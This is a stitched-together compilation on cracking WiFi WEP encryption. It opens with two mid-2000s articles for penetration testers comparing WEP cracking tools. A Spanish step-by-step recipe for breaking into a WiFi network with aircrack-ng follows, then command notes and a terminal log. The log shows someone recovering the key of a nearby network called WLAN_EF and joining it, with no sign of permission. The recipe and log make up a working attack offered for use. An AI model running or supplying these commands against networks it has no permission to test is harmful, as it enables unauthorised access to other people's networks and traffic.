WEP: Dead Again, Part 1 by Michael Ossmann

Source. 14/12/2004

Introduction
This article is the first of a two-part series that looks at the new generation of WEP cracking tools for WiFi networks, which offer dramatically faster speeds for penetration testers over the previous generation of tools. In many cases, a WEP key can be determined in seconds or minutes. Part one, below, compares the latest KoreK based tools that perform passive statistical analysis and brute-force cracking on a sample of collected WEP traffic. Next time, in part two, we'll look at active attack vectors, including a method to dramatically increase the rate of packet collection to make statistical attacks even more potent.

Is WEP that bad?
Many security folks and even more wireless folks these days are saying that WEP isn't all that bad. They say that if you use modern equipment that filters weak Initial Vectors (IVs) and change your keys frequently (or at least once in a while), nobody wil ever crack your WEP. Sure, maybe some next-generation WEP attacks will arise one day that will change everything, but WEP is okay today for all but the most sensitive networks. Well, that next-generation is already here, heralded by highly functional tools that make WEP look weaker than Barney Fife on guard duty, sleeping on the job.
Let's take a look at some of the new tools that should be in every penetration tester's bag of tricks, rather then delving into the details of why the various attacks work. Time and time again, the industry has shown that it will not reject broken securi y safeguards until attacks are actually demonstrated in the real world. Here's how to quickly turn some heads.

The way things were
Since the summer of 2001, WEP cracking has been a trivial but time consuming process. A few tools, AirSnort perhaps the most famous, that implement the Fluhrer-Mantin-Shamir (FMS) attack were released to the security community -- who until then were aware of the problems with WEP but did not have practical penetration testing tools. Although simple to use, these tools require a very large number of packets to be gathered before being able to crack a WEP key. The AirSnort web site estimates the total number of packets at five to ten million, but the number actually required may be higher than you think.
The first caveat to this old approach is that only encrypted packets count. As wireless access points transmit unencrypted beacons several times per second, it is easy to be fooled into believing that you have a larger number of useful packets than you really do. If you use Kismet for network discovery and sniffing, it breaks down the packet count for you, displaying the number of "Crypted" packets separately from the total number, as shown below: 

Figure 1
Figure 1. Kismet in action.

The second thing working against your packet collection efforts is that only certain "interesting" or "weak" IVs are vulnerable to attack. Kismet also tells you how many of these have been gathered, although it may not use the same counting methodas the various cracking tools. To make matters more difficult, wireless manufacturers responded to the FMS attack by filtering out the majority of weak IVs that their access points and wireless cards transmit. Unless your target network is using old equipment, chances are you'll have to collect no less than ten million encrypted packets to crack a WEP key using these older tools.
In early 2002, h1kari released a tool called dwepcrack (part of the bsd-airtools package) that improved upon the existing implementations of the FMS attack. Although dwepcrack did a good job of advancing the practical implementation of statistical WEP cr ptanalysis, its improvements were only incremental.

Tools that changed everything
On August 8th, 2004, a hacker named KoreK posted new WEP statistical cryptanalysis attack code (soon to become a tool called chopper) to the NetStumbler forums. While chopper is functional, it is not currently maintained, and the attacks have since seen better implementations in aircrack and WepLab. However, the KoreK attacks change everything. No longer are millions of packets required to crack a WEP key; no longer does the number of obviously "weak" or "interesting" IVs matter. With the new attacks, the critical ingredient is the total number of unique IVs captured, and a key can often be cracked with hundreds of thousands of packets, rather than millions.

Aircrack
The first tool in our new WEP cracking toolbox is aircrack by Christophe Devine. Implementing KoreK's attacks as well as improved FMS, aircrack provides the fastest and most effective statistical attacks available. To give aircrack a try, simply collect s many packets as possible from a WEP encrypted wireless network, save them as a pcap file, and then start aircrack from the command line. 

Figure 2
Figure 2. aircrack succeeds.

How many packets does it take?
The number of packets required for success with aircrack varies greatly. As a rule of thumb, shoot for a minimum of 200,000 for a 64 bit key and 500,000 for a 128 bit key, and remember to count only encrypted packets with unique IVs, not total packets. aircrack comes with a handy packet capture tool called airodump that keeps a running tally of unique IVs (the counting method is imperfect but soon to be fixed) and is capable of handling very large capture files. Personally, I find it easier to use Kismet most of the time and simply estimate the number of unique IVs based on the number of "Crypted" packets reported by Kismet. The number of encrypted packets with unique IVs is typically more than 95% of the total number of encrypted packets.

How long does it take?
I often find that aircrack determines a WEP key within a few seconds, but the execution time is highly variable. Shorter execution times require more unique IVs, more luck, and the lowest successful "fudge factor," a setting that tells aircrack how wildly it should guess when trying new keys. The higher the fudge factor, the more keys aircrack will try, increasing both the potential time of execution and the likelihood that the attack will succeed. The fudge factor has a default value of two but may be set to any positive integer. The default setting may be a good place to start, but trying several different settings is frequently fruitful if the initial attack does not succeed. I have encountered some data sets that could be cracked with a fudge factor of one, several that could only be cracked with three, four, or higher, and one data set that could only be cracked with a fudge factor of 31 or higher.
The higher the fudge factor, the more branches aircrack will take. This generally results in a longer execution time unless a successful crack happens early in the process. The following graph shows the time of execution as reported by aircrack (not counting file loading and parsing) for a particular data set with various fudge factors. Blue dots represent the time required for a successful crack and red dots represent the time spent in a failed attempt. 

Figure 3
Figure 3. aircrack execution times.

If the default fudge factor (two) fails, I usually double it for each subsequent attack on the same data set. By terminating any attack that takes longer than five or ten minutes, I have had good luck finding a successful fudge factor fairly quickly.
One of the nice features of aircrack is that it works for both 64 bit and 128 bit WEP keys by default. If you know the key length of the target network, giving the length to aircrack as a command line option can speed up the process.

WepLab
Although not quite as successful in my tests, Jose Ignacio Sanchez's WepLab provides an alternative implementation of the KoreK attacks that can be nearly as effective as aircrack, with a little experimentation. Similar to aircrack's fudge factor, WepLab provides a probability adjustment with its --perc command line option. The default --perc setting of 50% is fairly aggressive and results in relatively few branches, while higher settings increase the number of branches taken. In addition to excellent statistical attacks, WepLab provides brute force and dictionary cracking attacks that can be very effective. This combination of techniques makes WepLab an essential tool.

Comparing the tools
WepLab and aircrack are certainly impressive, but are they the best tools in the box? To find out, I performed a series of tests comparing the ability of several statistical WEP cracking tools. To set up the test, I configured a wireless access point with a random 128 bit WEP key, generated a great deal of traffic, and collected about 25 million encrypted packets. I then carved up the capture into shuffled subsets of various lengths and tried to crack each subset with each tool, measuring the number of seconds for every successful crack (including file load times). Trials that lasted more than ten hours were terminated. The results surprised me quite a bit. 

                             128 bit Cracking Time in Seconds
    Data  Weak    Unique     |      aircrack AirSnort         WepLab         dwepcrack
 Packets  IVs     IVs        aircrack (4)    |       WepLab  (95)    WEPCrack
23457438  8560    16775533   Failed  245     92      Failed  244     Failed  Error
21016149  1807    16775167   Failed  249     41      Failed  247     Failed  Failed
19584364  9340    16275925   Failed  230     114     Failed  229     Failed  Failed
15690079  8694    12860342   Failed  184     90      Failed  179     Failed  Error
15628308  5505    12361369   Failed  176     70      Failed  174     Failed  Failed
11743639  8473    11743639   Failed  154     69      Failed  153     Failed  Error
11739339  3037    11693841   Failed  150     Failed  Failed  151     Failed  Failed
7829104   1001    5031233    Failed  74      Failed  Failed  77      Failed  Error
7799213   5225    7779299    Failed  87      37      Failed  101     Failed  Failed
4175159   1554    4069824    52      51      Failed  Failed  54      Failed  Failed
3914568   767     3914568    Failed  Failed  Failed  Failed  Failed  Failed  Error
3914553   3958    3914553    48      49      Failed  Failed  56      Failed  Error
3884657   1490    3864743    48      46      Failed  Failed  52      Failed  Failed
978652    986     978652     Failed  Failed  Failed  Failed  11      Failed  Error
978633    371     978633     Failed  12      Failed  Failed  13      Failed  Error
977219    264     974902     Failed  9       Failed  Failed  13      Failed  Failed
684992    143     684992     8       8       Failed  Failed  11      Failed  Error
683605    238     681288     Failed  18      Failed  Failed  13      Failed  Failed
587184    117     587184     Failed  27      Failed  Failed  Long    Failed  Error
489293    103     489293     8       7       Failed  5       5       Failed  Error
489286    115     489286     15      16116   Failed  Failed  Long    Failed  Error
391465    78      391465     5       13      Failed  Failed  Long    Failed  Error
391433    78      391433     Failed  6       Failed  Failed  6       Failed  Error
293596    65      293596     Failed  5       Failed  Failed  Long    Failed  Error
293579    65      293579     Failed  Failed  Failed  Failed  Failed  Failed  Error
Table 1. 128 bit WEP Cracking Times (in seconds).

Although aircrack was successful with the greatest number of data sets, it did not perform as well as I expected with the default fudge factor. In fact, beyond about four million packets, its success rate with default options noticeably declined with the addition of more packets. This problem was easily remedied, however, by increasing the fudge factor. A fudge factor of four was successful in nearly every case. In the few cases in which a fudge factor of four did not work, I was able to find a successfu setting in the five to twenty range.

WepLab's nearly complete failure with default options was surprising, but a little experimentation resulted in a --perc setting of 95% that rivaled even aircrack's best results. For some data sets, WepLab was more successful than aircrack; for others, aircrack was the winner. Overall, both tools yielded outstanding results with minor tweaking, though aircrack edged out WepLab in the smaller data sets.

AirSnort's success rate matched my expectations quite closely, cracking nearly every key with ten million or more packets but failing most of the time when using a smaller data set. AirSnort's speed beat out aircrack and WepLab in every case. Of course, an extra minute or two is rarely a concern, so the superior cracking ability of the KoreK attacks with far less required input puts WepLab and aircrack well above AirSnort in my book.

The most unexpected results were the total failures of WEPCrack and dwepcrack with all data sets. WEPCrack came up with as many as eleven out of thirteen correct bytes but always included incorrect bytes in its final result. Lacking a process to verify the correctness of a key, WEPCrack produced a false positive result every time. dwepcrack failed in every case, complaining of either "insufficient ivs," the inexplicable error, "unable to find a valid data packet in logfile," or, for my largest data set, "File too large." As the tests were performed under Linux, perhaps dwepcrack would be more successful in its native BSD environment.

Don't ignore the obvious
WepLab and aircrack make statistical attacks alarmingly easy, but many keys can be cracked without going to such lengths. The simple fact is that most people don't choose strong encryption keys, in part because vendors make it so easy to use weak ones. Because of this weakness, a great number of WEP encrypted networks are vulnerable to dictionary or brute force attacks that only require the capture of a single encrypted data packet to attempt.
The simplest brute force attack involves trying every possible binary key, a process that is completely impractical for 128 bit keys but may be worth trying for 64 bit keys if you have a few supercomputers lying around. WepLab and dwepcrack provide the ability; you provide the CPU cycles.
WepLab and WepAttack both provide two dictionary attack methods, one based on the more common MD5 hashing technique that many access points use to turn a passphrase into a binary WEP key, and the other using null terminated raw ASCII WEP keys, employed by a few devices. Knowledge of the target network hardware may help to determine which method would be preferred for a particular environment.
Because both of the above tools can use any dictionary in a text file or standard input, powerful password cracking utilities such as John the Ripper may be used to generate the word list. Combined with John's ability to apply rules (various capitalizations, appending numbers, etc.) to a basic dictionary, these tools result in a successful crack surprisingly often. Although both performed dictionary attacks successfully in my tests, WepLab executed faster while WepAttack provided the convenience of multiple simultaneous attack modes.
If a dictionary attack fails, an optimized brute force attack based on the vendor's passphrase method may be fruitful. For devices that use null terminated ASCII keys, WepLab offers a brute force attack that only tries ASCII bytes, resulting in a somewhat smaller (though still generally too large) key space. For the more common MD5 hashed passphrases, dwepcrack can execute an optimized brute force attack for 64 bit keys. This method, devised and first implemented by Tim Newsham, dramatically reduces the potential key space from 2^40 to 2^21 possible keys, resulting in an extremely fast attack.

The complete toolbox
Featuring the most effective statistical attacks available, aircrack may be the single most important tool in the box. WepLab is also essential, providing several techniques including an excellent alternative implementation of the KoreK attacks. AirSnort may be worth trying if you have a lot of packets to work with, but its position as statistical attack leader has been usurped. WepAttack is a nice addition for dictionary attacks, and dwepcrack provides the most fruitful brute force technique. The only other essential ingredient is a method to collect packets; while most of these tools include packet gathering as a built-in ability or ancillary program, I personally prefer Kismet for this function. All of these tools are available in the Auditor Security Collection live Linux CD-ROM.

Concluding part one
Looking at the outstanding success rate of aircrack and WepLab in the 500,000 to 1,000,000 packet range, it is clear that a new era is upon us. Vendors' efforts to limit the transmission of weak IVs have been blown away, and the time required to collect packets for a successful statistical attack has been reduced twentyfold. If you thought WEP was okay, think again.
All of the tools discussed so far are completely passive, receiving data but transmitting nothing. In part two, we will look at active WEP attacks, including a method to dramatically increase the rate of packet collection, making statistical attacks even more potent. Fasten your seat belts.

Notes:
Because a majority of the tools refer to 64 bit and 128 bit key lengths, this article adopts the convention. It is important to realize, however, that the secret portion of a 64 bit key is only 40 bits and the secret portion of a 128 bit key is only 104 bits.
All tests were performed with a 1.6GHz Pentium-M laptop running Gentoo Linux (2.6.8.1 kernel). Linux was chosen for the tests in order to accommodate the greatest number of tools. Some of the tools are also available for OS X, Windows, and/or various BSDs. In addition, there are a few tools for the other platforms that are not available for Linux. None of these, however, appear to implement the KoreK attacks except for the current development version of KisMAC.

Tool information and links: 

aircrack

      - version: 2.1
      - sample invocation: aircrack -n 128 packets.pcap
      - sample invocation: aircrack -f 4 -n 128 packets.pcap
      - source:  http://www.cr0.net:8040/code/network/aircrack/ 

AirSnort

      - version: 0.2.6
      - sample invocation: airsnort
      - 128 bit crack breadth: 2 (default)
      - source:  http://airsnort.shmoo.com/ 

Auditor Security Collection

      - version: 081004-01
      - source:  http://remote-exploit.org/?page=auditor  [got it]
      - download here

dwepcrack

      - version: 0.4
      - sample invocation: dwepcrack -s -w packets.pcap
      - sample invocation: dwepcrack -b packets.pcap
      - source:  http://www.e.kth.se/~pvz/wifi/ 
      - notes: also tried binary from Auditor Security Collection with identical results

John the Ripper

      - version: 1.6
      - source:  http://www.openwall.com/john/ 
      - wiki : en.wikipedia.org/wiki/John_the_Ripper

Kismet (scanning tool)

      - version: Kismet-2004-10-R1
      - source:  http://www.kismetwireless.net/ 

WepAttack

      - version: 0.1.3
      - sample invocation: john -w:words.txt -rules -stdout | wepattack -m n64 -f packets.pcap
      - source:  http://wepattack.sourceforge.net/ 

WEPCrack

      - version: 0.1.0
      - sample invocation: pcap-getIV.pl -b 13 -f packets.pcap; WEPCrack.pl
      - source:  http://wepcrack.sourceforge.net/ 

WepLab

      - version: 0.1.3
      - sample invocation: weplab -rpackets.pcap --key 128 testers.pcap
      - sample invocation: john -w:words.txt -rules -stdout | weplab -y --key 64 --attacks 1 testers.pcap
      - source:  http://weplab.sourceforge.net/

Ideally, the input data sets would come from a variety of source networks with varied hardware and WEP keys. Although the results are not fully comprehensive, the spot checks against various networks generally agree with the test results.

WEP: Dead Again, Part 2 by Michael Ossmann

Source. 08/03/2005 New url.

Introduction
In part one we examined the latest generation of passive WEP cracking tools that use statistical or brute force techniques to recover WEP encryption keys from captured wireless network traffic. This time, in the second and final article, we take a look at active tools that use 802.11 transmissions to attack WEP networks.
All of these active wireless attack techniques discussed in this article require the ability to inject arbitrary packets onto a wireless network. Although a variety of injection methods are available, most require Linux, are unsupported, and use hacked drivers that have support and availability problems. All of them require at least one wireless PCMCIA card based on the Prism2 chipset (such as the Senao 2511-CD-PLUS). Fortunately, the Auditor Security Collection [ref 1] live cd-rom can save you a number of headaches as it includes ready-to-use drivers for several active attack tools.
Beware of network disruptions that can be caused by active attacks. Using these tools may have unpredictable effects in various environments. In my testing, I have encountered a few systems that had to be rebooted in order to function again after being bombarded with injected packets.

Rapid traffic generation
If you've spent much time sniffing wireless networks (and, if you are reading this article, I bet you have) then you probably have noticed that the source and destination MAC addresses are plainly visible for every packet even when the packet contents are encrypted with WEP. This allows you to uniquely identify hosts on the wireless network as well as hosts on a bridged, wired LAN. If you've never tried traffic analysis of an encrypted wireless network, I highly recommend the exercise. Find a busy network, fire up Ethereal [ref 2], and try to answer as many of the following questions as you can:

  • * How many access points share the same ESSID?
  • * Does the access point bridge or route traffic?
  • * Is EAP used? If so, what EAP type?
  • * Is open system or shared key authentication in use?
  • * What is the MAC address of the default gateway?
  • * What are the NIC vendors for wireless hosts?
  • * What are the NIC vendors for wired hosts?
  • * What is the vendor of the access point?
  • * Can you find a DNS transaction?
  • * Can you find a TCP three-way handshake?
  • * Can you find an HTTP transaction?
  • * What hosts transmit/receive the most bytes/packets?
  • * Does any traffic occur with a distinct periodicity (like POP3 every 5 minutes)?
  • * Can you find any ARP traffic? (hint: frame.pkt_len==68 and wlan.da==ff:ff:ff:ff:ff:ff)

No wireless network based on WEP provides protection against replay attacks. With the right tools, you can take any captured packet and reinject it back onto the network. The packet will be correctly encrypted even though you have no idea of its contents. Then again, you may have a pretty good guess as to its contents based on traffic analysis. You might choose something that is likely to be an ARP request, hoping that it will generate a response from another host on the network. If you're right, you could replay the same packet hundreds or even thousands of times per second, forcing that host to spew an enormous stream of responses, individually encrypted with different IVs.
This method described is exactly the method used by aireplay, a tool that comes with aircrack [ref 3]. A screenshot of aireplay is shown below in Figure 1. As we discovered in part one, both aircrack and WepLab [ref 4] are capable of cracking WEP keys after collecting just a few hundred thousand packets. With a successful aireplay attack, you can generate that many packets in just a few minutes. Therefore, people who say that re-keying every 10 minutes makes WEP unbreakable are dead wrong. Per-session, per-user keys also don't stand a chance against this attack. WEP is truly dead. . . again. 
Figure 1. Aireplay at work.
The Auditor Security Collection live cd-rom makes it relatively easy to try aireplay because it includes aircrack's patched hostap driver by default, but you will need two wireless cards with at least several inches distance between their antennas. You may find it easier to use two laptops, one with a Prism2 card to replay captured packets, and a second to capture all the new traffic that is generated. Be prepared to spend some time finding an appropriate packet to replay; you may need to save individual packets with Ethereal and feed them to aireplay.
Another tool that implements a similar attack has been around for much longer in the BSD world. Part of OpenBSD's Wnet, reinj performs the same attack as aireplay and does it all with just one Prism2 card (as does the latest beta of aireplay). Whichever tool you use to generate traffic, I recommend WepLab or aircrack for cracking the WEP key.

Encrypted packet injection
Most of the WEP attack tools on the scene today focus on cracking WEP keys, but there are also other WEP vulnerabilities that can be exploited. WEPWedgie [ref 5], a tool released in 2003 by Anton Rager, allows an attacker to craft an arbitrary plaintext packet and inject it into the wireless network without knowledge of the WEP key. The receiving stations accept the packet as if the sender used the correct key to encrypt the packet. The way WEPWedgie is able to accomplish this is by reconstructing the key stream that was used to encrypt a particular plaintext. With knowledge of some plaintext and the resulting ciphertext, a simple XOR operation yields the keystream that results from a particular IV. And because WEP allows the same IV to be used over and over again, WEPWedgie can use the keystream to correctly encrypt and inject any number of packets whose contents are limited only by the length of the known keystream.
There are a number of ways that an attacker can discover the ciphertext for a known plaintext, but the method used by WEPWedgie's prgasnarf is to listen for shared key authentication. The 802.11 standard defines two types of authentication, "open system authentication" (which you can think of as "no authentication") and "shared key authentication" (which you can think of as "the most misguided authentication mechanism ever devised"). In shared key authentication, the AP transmits 128 bytes of plaintext, and then the station encrypts the plaintext and transmits the resulting ciphertext using the same key and cipher that are used by WEP to encrypt subsequent network traffic. Believe it or not, this horrifying scheme is still being recommended by certain vendors [ref 6] as a security enhancement, but it is less common in practice than open system authentication.
Once a keystream has been captured (hint: spoofed deauthentication), WEPWedgie provides a number of interesting packet injection attacks. A simple one sends a ping to a target of your choice. The other attacks provide a method of port scanning targets on the wireless network using a chosen source address. As long as the target network has Internet connectivity, you can use the address of a host you control on a remote network and sniff the results of your scan on that host. Interpretation of the results is up to you. 

Figure 2. Wepwedgie injecting pings.

To try out WEPWedgie, you'll need a system running a Linux 2.4 kernel, a Prism2 card, and Abaddon's AirJack [ref 7] driver. Unfortunately the Auditor CD's 2.6 kernel isn't supported by AirJack, so you'll have to prepare a system on your own. You might find the Wi-Fi Dog of War [ref 8] instructions helpful to get AirJack working.

Single packet decryption
KoreK, the individual who brought us the improved algorithms used in aircrack and WepLab, released a tool a few months ago on the NetStumbler forums that enables an attacker to decrypt individual packets without knowledge of the WEP key. Called chopchop [ref 9], this tool replays a single encrypted packet, modifying one byte at a time. By monitoring the access point to find out if it accepts the modified packet, chopchop is able to determine the plaintext value of that particular byte and move on to the next. Within several seconds (and thousands of replayed packets), chopchop can decrypt an entire packet. It doesn't matter what encryption key was used, or if a separate key is used for each user, or if the key changes every hour or minute; any packet can be decrypted. 

Figure 3. Chopchop decrypting a single packet.

You can use the Auditor CD and a single Prism2 card to try chopchop. Use the switch-to-wlanng script that Auditor provides, pop the card out and then back in again, and the linux-wlan-ng driver will be working, complete with KoreK's injection modificatios.

The next generation
Since the release of chopchop, the task of acquiring a valid keystream for encrypted packet injection has become trivial for all WEP encrypted networks. Joshua Wright is working on a new version of WEPWedgie that incorporates the chopchop attack and works with newer drivers. Christophe Devine's upcoming version of aireplay, already released as a beta, uses the same technique to allow the forgery of any ARP request. Various people are working to improve wireless drivers, including implementation of packet injection with a wider variety of hardware (prism54 is reported to work already), and construction of an abstraction layer for packet injection.

Conclusion
Some vendors continue to sell products that completely lack reasonable wireless security features. In just two months since the publication of part one of this article, I've encountered multiple brand new devices, including Wi-Fi VOIP phones and and acces point provided by a cable Internet provider, that provide no encryption capability other than WEP. As long as this continues, white hats and black hats alike will keep improving the attack techniques that render WEP even worse than useless.
For the most part, the newer WEP attack tools exploit vulnerabilities that were described in theory four or more years ago. Perhaps people will learn from the history of WEP the lesson that theoretical vulnerabilities will become real vulnerabilities. Until they do, you can use these penetration testing tools to assess the weaknesses of your own network and maybe even convince someone that change is needed.

Tools and links 

[1] Auditor Security Collection:
  http://remote-exploit.org/?page=auditor

[2] Ethereal:
  http://www.ethereal.com/

[3] aircrack:
  http://www.cr0.net:8040/code/network/aircrack/

[4] WepLab:
  http://weplab.sourceforge.net/

[5] WEPWedgie:
  http://sourceforge.net/projects/wepwedgie/

[6] Linksys recommends shared key authentication:
  http://www.linksys.com/splash/wirelessnotes.asp

[7] AirJack:
  http://sourceforge.net/projects/airjack/

[8] Wi-Fi Dog of War Mini How-To:
  http://www.geekspeed.net/~beetle/download/wifi_dog.html

[9] chopchop:
  http://www.netstumbler.org/showthread.php?t=12489

About the author
Michael Ossmann is a security administrator for Exempla Healthcare.

How to break into a Wifi link
Receta

Voy a poner una recetilla para sacar la clave WEP con Aircrack-ng, como apoyo a Video: hackear WEP en 10 minutos (url bad) (url ok) y Video: hackear WEP en 10 minutos (II), ya que se basan en Aircrack y no en Aircrack-ng, y de paso añadir a la receta la posibilidad de usar Aircrack-ptw.

Los pasos se pondran con ath0, wifi0 y ath1 como interfaces (tarjetas Atheros), sustituyendose para cada caso por la que corresponda.

1. Lo primero tener correctamente instalados los drivers para nuestra tarjeta, para poderla poner en modo monitor e inyectar trafico, esto ya depende del chipset que tenga la tarjeta, en mi caso es Atheros y el driver es MadWifi. Aqui teneis una buena pagina para ver que chipset usa cada tarjeta, asi como el driver, pudiendo filtrar por fabricante, chipset, etc : Linux wireless LAN support

2. Una vez configurada la tarjeta y funcionando, habra que ponerla en modo monitor, normalmente:

iwconfig ath0 mode monitor

en caso de que este método no sirva (con atheros no es valido este metodo):

airmon-ng start wifi0 [canal]

Esto creara una nueva interfaz ath1 que sera la que usemos a partir de ahora (para otros Drivers/Chipsets la que corresponda). Opcionalmente podemos poner un canal.

3. Ver que redes/clientes hay al alcance; para ello usaremos airodump-ng de la siguiente manera:

airodump-ng -w archivocaptura ath1

De esta forma veremos que redes/clientes hay para todos los canales.

4. Fijamos el objetivo, y miramos su bssid o mac y el canal en el que trabaja; para capturar especificamente para esa red:

airodump-ng -channel 9 -w archivocaptura ath1

Si se quiere restringir la captura a una red determinada, porque hay varias redes en el mismo canal, y queremos que la captura sea solo de una de ellas:

airodump-ng --bssid XX:XX:XX:XX:XX:XX -channel N -w archivocaptura ath1

Siendo XX:XX:XX:XX:XX:XX la MAC del AP objetivo y N el canal en el que está. La captura la haremos sin el -ivs, para que guarde los paquetes enteros, con vistas a poder usar aircrack-ptw que necesita que la captura se haga de esta forma.

5. Una vez que tenemos trabajando airodump-ng en un terminal, y tenemos algun cliente conectado a esa red (se ve en airodump-ng), abrimos otro terminal para la inyeccion de paquetes con aireplay:

aireplay-ng --arpreplay -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY ath1

Siendo XX:XX:XX:XX:XX:XX la MAC del AP objetivo y YY:YY:YY:YY:YY:YY la del cliente conectado a esa red. Ahora deberiamos notar un incremento en la velocidad de captura de datos por parte de airodump-ng, en cuanto aireplay-ng capture y reinyecte paquetes ARP.

6. En cuanto tengamos unos cuantos paquetes capturados (80k-100k segun cada uno) podemos poner a trabajar a aircrack-ng o usar aircrack-ptw que necesita menos datos capturados para sacar la clave.

aircrack-ng -0 -x -i 1 archivocaptura.cap

-i 1 es para decirle que el indice de clave sera 1 (1-4) que es lo normal, esto lo podemos quitar si queremos. Por defecto busca contraseñas de 128bits; si es de 64 tambien la sacara pero tardara algo mas. Si se quiere indicar que la clave es de 64bits, podemos poner el parametro -n 64.

Para aircrack-ptw:

aircrack-ptw archivocaptura.cap

Pues ya esta, esta es la receta. Si todo va bien, tendremos la clave, tanto en Hexadecimal como en ASCII.

Aclaración: las opciones -channel, -bssid y -arpreplay van con doble guión delante (por si no se ve bien).

url

Comandes i flags
iwlist
wifislax ~ # iwlist Usage: iwlist [interface] scanning [essid NNN] [last] [interface] frequency [interface] channel [interface] bitrate [interface] rate [interface] encryption [interface] keys [interface] power [interface] txpower [interface] retry [interface] ap [interface] accesspoints [interface] peers [interface] event [interface] auth [interface] wpakeys [interface] genie [interface] modulation

To display the AP's visible around you, use the command :

iwlist eth1 scan
iwconfig
iwconfig - configure a wireless network interface Synopsis iwconfig [interface] iwconfig interface [essid X] [nwid N] [mode M] [freq F] [channel C] [sens S ] [ap A ] [nick NN ] [rate R] [rts RT] [frag FT] [txpower T] [enc E] [key K] [power P] [retry R] [commit] iwconfig --help iwconfig --version

To enter WPA key, use

root@om-gta02:~# wpa_supplicant -i eth1 -c /etc/wpa_supplicant/wpa_supplicant.conf -B

and wpa_supplicant.conf contents is :

ctrl_interface=/var/run/wpa_supplicant ctrl_interface_group=0 eapol_version=1 ap_scan=1 fast_reauth=1 # WPA: network={ ssid="your_ssid" proto=WPA key_mgmt=WPA-PSK pairwise=TKIP group=TKIP scan_ssid=1 # psk="secret key" psk=0hexbmorehex6d1andmorehex1etcetcetc priority=10 }

The value of psk will need to be modified according to the output of:

wpa_passphrase <ssidName> <whateverYourPassphraseis>

The use of a hex psk will speed up association.

airodump-ng
airodump-ng - a packet capture tool for aircrack-ng Synopsis airodump-ng [options] <interface name> -w <prefix>, --write <prefix> Is the dump file prefix to use. If this option is not given, it will only show data on the screen. -d <bssid>, --bssid <bssid> It will only show networks matching the given bssid. -a It will only show associated clients.
aireplay-ng

aireplay-ng injects specially generated ARP-request packets into an existing wireless network in order to generate traffic. By sending these ARP-request packets again and again, the target host will respond with encrypted replies, thus providing new and possibly weak IVs.

Synopsis aireplay-ng [options] <replay interface> -a <bssid> Set Access Point MAC address. -b <bssid> MAC address of access point. -h <smac> Set source MAC address. -e <essid> Set target SSID for Fake Authentication attack (see below). Attack modes: -0 <count>, --deauth=<count> Deauthenticate stations. -1 <delay>, --fakeauth=<delay> Fake authentication with AP. -2, --interactive Interactive frame selection. -3, --arpreplay Standard ARP-request replay. -4, --chopchop Decrypt/chopchop WEP packet. -5, --fragment Generates a valid keystream. -9, --test Tests injection and quality.
aircrack-ng

aircrack-ng - a 802.11 WEP / WPA-PSK key cracker

Synopsis aircrack-ng [options] .cap/.ivs file(s)

Es millor fer servir aircrack-ptw

Bienvenido a Aircrack PTW v 1.0.0 (Spanish Build 2) Pagina oficial: http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/ Traduccion y mejoras por: Stilo16v (http://www.seguridadwireless.net) Uso: aircrack-ptw Ejemplo: aircrack-ptw 00-01-02-03-04-05.cap
dhcpcd
Synopsis dhcpcd
wifislax ~ # airodump-ng eth1 -w file1 CH 1 ][ Elapsed: 1 min ][ 2009-04-11 12:26 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:02:CF:75:FE:28 0 24 0 0 10 54. WEP WEP WLAN_EF 00:02:CF:C0:46:38 0 10 0 0 9 54. WEP WEP WLAN_E0 00:19:15:4F:92:AA 0 121 0 0 3 54 WEP WEP WLAN_C5 00:16:38:EA:A3:31 0 38 0 0 3 54 WEP WEP WLAN_1C 00:1A:2B:68:9A:0D 0 266 0 0 3 54 WEP WEP WLAN_83 00:1A:2B:0D:1B:CD 0 762 0 0 3 54 WPA TKIP PSK korneret BSSID STATION PWR Lost Packets Probes 00:1A:2B:68:9A:0D 00:1D:E0:5A:3F:B3 0 0 801 WLAN_83 00:1A:2B:68:9A:0D 00:1E:0B:54:9C:28 0 0 681 00:60:B3:50:E3:E6 00:10:A7:2C:42:1A 0 0 8218 00:02:CF:DD:5C:AB 00:23:4D:A4:65:B6 0 0 10 WLAN_D0 (not associated) 00:13:CE:A8:EE:E4 0 0 10 calacinta wifislax ~ # airodump-ng eth1 -w file1 -d 00:1A:2B:68:9A:0D CH 3 ][ Elapsed: 12 s ][ 2009-04-11 12:28 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1A:2B:68:9A:0D 0 43 0 0 3 54 WEP WEP WLAN_83 BSSID STATION PWR Lost Packets Probes 00:1A:2B:68:9A:0D 00:1E:0B:54:9C:28 -1 0 1 wifislax ~ # aireplay-ng -1 0 -e WLAN_EF -a 00:02:CF:75:FE:28 -h 00:11:22:33:44:55 ra0 17:05:22 Waiting for beacon frame (BSSID: 00:02:CF:75:FE:28) 17:05:24 Sending Authentication Request 17:05:24 Authentication successful 17:05:24 Sending Association Request 17:05:24 Association successful :-) wifislax ~ # aireplay-ng -3 -b 00:02:CF:75:FE:28 -h 00:11:22:33:44:55 ra0 Saving ARP requests in replay_arp-0411-170554.cap You should also start airodump-ng to capture replies. Read 67111 packets (got 26432 ARP requests), sent 340904 packets...(335 pps) wifislax ~ # aircrack-ptw file1-01.cap Bienvenido a Aircrack PTW v 1.0.0 (Spanish Build 2) Pagina oficial: http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/ Traduccion y mejoras por: Stilo16v (http://www.seguridadwireless.net) Buscando una nueva tabla BSSID = 00:02:CF:75:FE:28 Keyindex=0 Estadisticas para BSSID 00:02:CF:75:FE:28 Keyindex=0 Paquetes=97154 Clave encontrada con longitud 13: 5A 30 30 30 32 43 46 37 37 35 32 45 46 Equivalente en ASCII: Z0002CF7752EF wifislax ~ # iwconfig ra0 mode managed key 5A:30:30:30:32:43:46:37:37:35:32:45:46 wifislax ~ # dhcpcd ra0 wifislax ~ # iwconfig lo no wireless extensions. ra0 RT2500 Wireless ESSID:"WLAN_EF" Mode:Managed Frequency=2.457 GHz Access Point: 00:02:CF:75:FE:28 Bit Rate=1 Mb/s Tx-Power:2 dBm RTS thr:off Fragment thr:off Encryption key:5A30-3030-3243-4637-3735-3245-46 Security mode:open Link Quality=28/100 Signal level:-82 dBm Noise level:-97 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 eth0 no wireless extensions. wifislax ~ # ifconfig -ra0 ra0 Link encap:Ethernet HWaddr 00:11:22:33:44:55 inet addr:192.168.1.33 